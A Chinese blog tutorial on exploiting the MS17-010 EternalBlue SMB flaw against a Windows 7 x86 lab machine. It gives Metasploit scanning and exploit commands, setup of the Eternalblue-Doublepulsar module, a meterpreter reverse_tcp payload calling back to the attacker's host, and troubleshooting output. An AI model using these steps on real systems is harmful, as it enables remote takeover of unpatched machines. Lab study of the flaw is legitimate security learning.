MS17-010就是我们常说的永恒之蓝漏洞

“永恒之蓝”利用Windows系统的SMB漏洞(445端口)可以获取系统最高权限

1.首先我们测试目标系统是否存在该漏洞

2.永恒之蓝漏洞利用前的准备与之后的实施

3.问题总结

4.如果使用该模块攻击win7x64注意事项


这篇文章主要写的是对win7(x86)系统的渗透,x64的请点击这里利用MS17-010渗透win7(64位), 我们这里的环境是攻击者(IP:192.168.1.222),靶机(IP:192.168.1.221)

1.首先我们测试目标系统是否存在该漏洞:

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > show options Module options (auxiliary/scanner/smb/smb_ms17_010):Name         Current Setting                                                 Required  Description----         ---------------                                                 --------  -----------CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hostsCHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hostsCHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hostsNAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to checkRHOSTS                                                                       yes       The target address range or CIDR identifierRPORT        445                                                             yes       The SMB service port (TCP)SMBDomain    .                                                               no        The Windows domain to use for authenticationSMBPass                                                                      no        The password for the specified usernameSMBUser                                                                      no        The username to authenticate asTHREADS      1                                                               yes       The number of concurrent threadsmsf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.1.133
rhosts => 192.168.1.133
msf auxiliary(scanner/smb/smb_ms17_010) > exploit [+] 192.168.1.133:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7600 x86 (32-bit)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

2.永恒之蓝漏洞利用前的准备与之后的实施:

所以我们我们接下来进行渗透,但kali里没有32位的利用模块,所以我们接下来进行安装:
(1)首先将github的项目下载下来,下载地址请点击,将下载下来的Eternalblue-Doublepulsar-Metasploit-master的名字改为Eternalblue-Doublepulsar-Metasploit并将改完名后的整个目录复制到root目录下

(2)再将Eternalblue-Doublepulsar-Metasploit中的eternalblue_doublepulsar.rb
拷贝到/usr/share/metasploit-framework/modules/exploits/windows/smb目录中

root@kali:~/Eternalblue-Doublepulsar-Metasploit# cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb


(3)可能缺少多架构支持,所以我们安装多架构支持,所以安装win 32

wine -h

运行完上面命令后再运行下面的:

dpkg --add-architecture i386 && apt-get update && apt-get install wine32

(4)运行postgresql 数据库

service postgresql start

(5)使用该exploit模块

msf > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(windows/smb/eternalblue_doublepulsar) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/smb/eternalblue_doublepulsar) > show options Module options (exploit/windows/smb/eternalblue_doublepulsar):Name                Current Setting                                  Required  Description----                ---------------                                  --------  -----------DOUBLEPULSARPATH    /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of DoublepulsarETERNALBLUEPATH     /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of EternalbluePROCESSINJECT       wlms.exe                                         yes       Name of process to inject into (Change to lsass.exe for x64)RHOST                                                                yes       The target addressRPORT               445                                              yes       The SMB service port (TCP)TARGETARCHITECTURE  x86                                              yes       Target Architecture (Accepted: x86, x64)WINEPATH            /root/.wine/drive_c/                             yes       WINE drive_c pathPayload options (windows/meterpreter/reverse_tcp):Name      Current Setting  Required  Description----      ---------------  --------  -----------EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)LHOST                      yes       The listen address (an interface may be specified)LPORT     4444             yes       The listen portExploit target:Id  Name--  ----8   Windows 7 (all services pack) (x86) (x64)msf exploit(windows/smb/eternalblue_doublepulsar) > set rhost 192.168.1.221
rhost => 192.168.1.221
msf exploit(windows/smb/eternalblue_doublepulsar) > set lhost 192.168.1.222
lhost => 192.168.1.222
msf exploit(windows/smb/eternalblue_doublepulsar) > set processinject explorer.exe
processinject => explorer.exe
msf exploit(windows/smb/eternalblue_doublepulsar) > exploit

(说明:经Github项目中介绍,如果explorer.exe测试失败,可以改用processinject参数为lsass.exe等)
如果成功,恭喜你,一发入魂,成功了,否则。。。看下面吧

3.问题总结:

(其中有我遇到的问题,有我没有遇到的,但我这里总结了一下别人遇到的,未雨绸缪)
问题一(这个我也遇到过,不过我安装了上面的win 32就没问题了):
原因:这个因为没有/root/.wine目录,执行以下命令即可创建该目录

wine cmd.exe

问题二(我没有遇到):

原因:wine在使用过程中会出现图形化界面,这就需要这个基于Mozilla的Gecko渲染引擎来呈现,手动安装所需版本的wine-gecko即可。我们首先下载Wine提供的MSI二进制文件,请注意下载32位版本的,因为我们安装的是wine32
解决办法:

wget https://dl.winehq.org/wine/wine-gecko/2.44/wine_gecko-2.44-x86.msi安装wine-gecko
wine msiexec /i wine_gecko-2.44-x86.msi

问题三(我没有遇到):

原因:这个是由于环境变量导致的,我们需要重新设置环境变量,默认的是64位,修改为32位的。执行以下命令设置环境变量

env WINEPREFIX=$HOME/.wine32 WINEARCH=win32 winecfg

问题四(我没有遇到):

解决方法:安装时安装了wine-gecko库以后就没有出现这个错误了,所以如果出现这个错误,请参考解决2


问题五(这是我遇到的主要问题):

[-] Handler failed to bind to 192.168.1.211:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] 192.168.1.132:445 - Generating Eternalblue XML data
[*] 192.168.1.132:445 - Generating Doublepulsar XML data
[*] 192.168.1.132:445 - Generating payload DLL for Doublepulsar
[*] 192.168.1.132:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.1.132:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] 192.168.1.132:445 - Are you sure it's vulnerable?
[*] 192.168.1.132:445 - Launching Doublepulsar...
[-] 192.168.1.132:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.

问题六(这也是我主要遇到的问题):

这两种问题我都遇到过,最后就是重新换了个靶机,成功的…:当时真想和Oops, something was wrong!干一架,但emmm,冷静下来,思考一下,会不会是靶机的问题,于是我重新创建了一台win7x86的靶机,最终成功了ps:当时靶机是学校老师拷给我们学习数据库的…
注:[-] Handler failed to bind to 192.168.1.211:4444:- -这个问题你重新启动一下msf就好了


问题七:

遇到这种情况不要怕,你就快要成了!!!,继续再exploit一次,或者run一次!!!就成功了!!!


LAST:
最后来一张成功的图:

4.如果使用该模块攻击win7x64注意事项:

注1:
还有个问题:如果找不到dll文件,可能是你把Eternalblue-Doublepulsar-Metasploit-master拖动到kali里时漏了里面的一些文件,拖完之后一定要和原文件比对一下
注2:
如果靶机是64,还需要设置其他配置:
(1)在exploit/windows/smb/eternalblue_doublepulsar模块中

set PROCESSINJECT lsass.exe
与
set TARGETARCHITECTURE x64

(2)设置payload ,因为是64位所以需要设置64位的,否则无法获取反弹

set payload windows/x64/meterpreter/reverse_tcp

参考链接:
https://blog.csdn.net/userpass_word/article/details/85124266
https://bbs.ichunqiu.com/thread-23005-1-1.html

利用MS17-010渗透win7(32位)相关推荐

  1. 计算机32位操作系统最大识别到内存,win7 32位系统可以支持多大的内存_win7 的32位系统最大支持多少g的内存...

    大家都知道win7系统有32位和64位之分,而两者的安装配置是不一样的,一般4G内存的我们安装64位的系统,但是很多用户不知道win7 32位系统可以支持多大的内存,这就给大家分享一下win7 的32 ...

  2. 外网win10 64位环境下 为内网win7 32位安装三方包的最靠谱手段:python64位、32位全安装。...

    经过一周的各种折磨,如题.以下是我的经验和教训. 我的外网是win10 64位,内网环境win7 32位.由于未知原因,anaconda无法安装!!! 其实最靠谱的安装三方包的还是whl包.但是很有可 ...

  3. win7装xp双系统_UEFI新PC装Win7 32位系统:巧用”硬盘保护卡“解决

    免责声明:本文只是从技术角度进行讨论,主要因我自己的兴趣而引发测试.只代表个人观点,与任何组织机构无关. 在春节期间发表了<为了这个"完美"版Win7镜像,我用了一年的时间& ...

  4. win7 32位系统搭建iphone开发环境

    本文转自http://bbs.weiphone.com/read.php?tid=2173406,由于担心以后再用到的时候找不到,所以自己保存一份.也让有需要的朋友能够找到非常不错的资源. 教程我就简 ...

  5. 网站服务器 64位,如何将win7系统从32位升级到64位_网站服务器运行维护,win7,32位,64位...

    win10如何重置此电脑_网站服务器运行维护 win10重置此电脑的方法是:1.点击[开始]按钮,进入设置:2.进入[更新和安全]选项,点击[恢复]:3.找到[重置此电脑],点击[开始]:4.选择[保 ...

  6. win7计算机服务启动不了,win7 32位旗舰版提示依赖服务无法启动怎么修复

    win7 32位旗舰版系统用户最近遇上了一个问题计算机无法上网并提示依赖服务组无法启动,出现这种故障是怎么回事?win7 32位旗舰版提示依赖服务无法启动怎么修复?且看以下教程. 具体的解决方法: 有 ...

  7. windows win7 64位 win7 32位 win10共享打印机提示0x000006cc的解决方法

    windows win7 64位 win7 32位 win10共享打印机提示0x000006cc的解决方法: 点击左下角开始,点击运行,输入 cmd 点击确定,在命令窗口输入 netsh winsoc ...

  8. win7 32位的4g内存可用内存只有2g到3g怎么解决?

    win7 32位的4g内存可用内存只有2g到3g怎么解决?这里简要介绍一些常用的解决方法,可以适当的增加内存,需要的朋友可以参考下 win7 32位可用内存有时候只有2g多或者3g多,这里简要介绍一些 ...

  9. 计算机32位操作系统最大识别到内存,win7 32位系统支持多大内存

    很多小伙伴都不知道自己的电脑安装多大的内存最好,其实这个跟我们的系统位数有关系的,一般4G内存的我们安装64位的系统,那么32位的系统最大支持多大内存呢?下面小编来说说win7 32位系统支持多大内存 ...

  10. 萝卜家园 GHOST WIN7 32位快速装机版

    萝卜家园 GHOST Win7 32位快速装机版 V2020.08 采用适当的精简与优化,全面提升运行速度,充分保留原版性能.系统安装后自动永久激活,且通过微软正版认证系统.此系统优化了注册表,禁用了 ...

最新文章

  1. linux文件描述符设置
  2. javascript面试题以及对所涉及到的知识点的总结
  3. C#回顾 - 3.NET的IO:字节流
  4. js 中meta 移除head_浅析JS中数据结构
  5. 关于改变ListView选中项的状态方法
  6. linux ext4 inode,Ext4文件系统中inode数量的限制
  7. 浏览器Debugger
  8. 手机怎么查看视频的MD5
  9. 图说当下——人生感悟
  10. CentOS系列的绑定MAC(物理网卡地址)
  11. 用户增长——CLV用户生命周期价值CLTV 笔记(一)
  12. 【游戏开发】unity教程4 打飞碟小游戏
  13. 自媒体一般都是去哪里搬运
  14. uniapp苹果端IOS日期类型显示NAN
  15. Oracle基础学习之三—查询
  16. MySQL Study之--Mysql数据库备份工具(mysqldump)
  17. 选择优秀IT培训机构的终极建议!
  18. 英语单词学习-10-26
  19. 牛牛的跳跳棋【贪心】
  20. 合理的进度安排--人月

热门文章

  1. windows下利用_popen,_wopen创建管道进行系统命令输出数据
  2. ES6基础4(数据结构)-学习笔记
  3. 《leetcode》spiral-matrix-ii(构造螺旋矩阵)
  4. eclipse上安装hadoop后报错 Error:org.hadoop.security.AccessControlException:Permission
  5. ArrayList和Vector的异同
  6. Faker库:一个数据造假的神库
  7. Machine Learning On Spark——基础数据结构(二)
  8. 深入理解Spark 2.1 Core (七):Standalone模式任务执行的原理与源码分析
  9. 网易云 6 亿用户音乐推荐算法
  10. AJPFX关于构造器的总结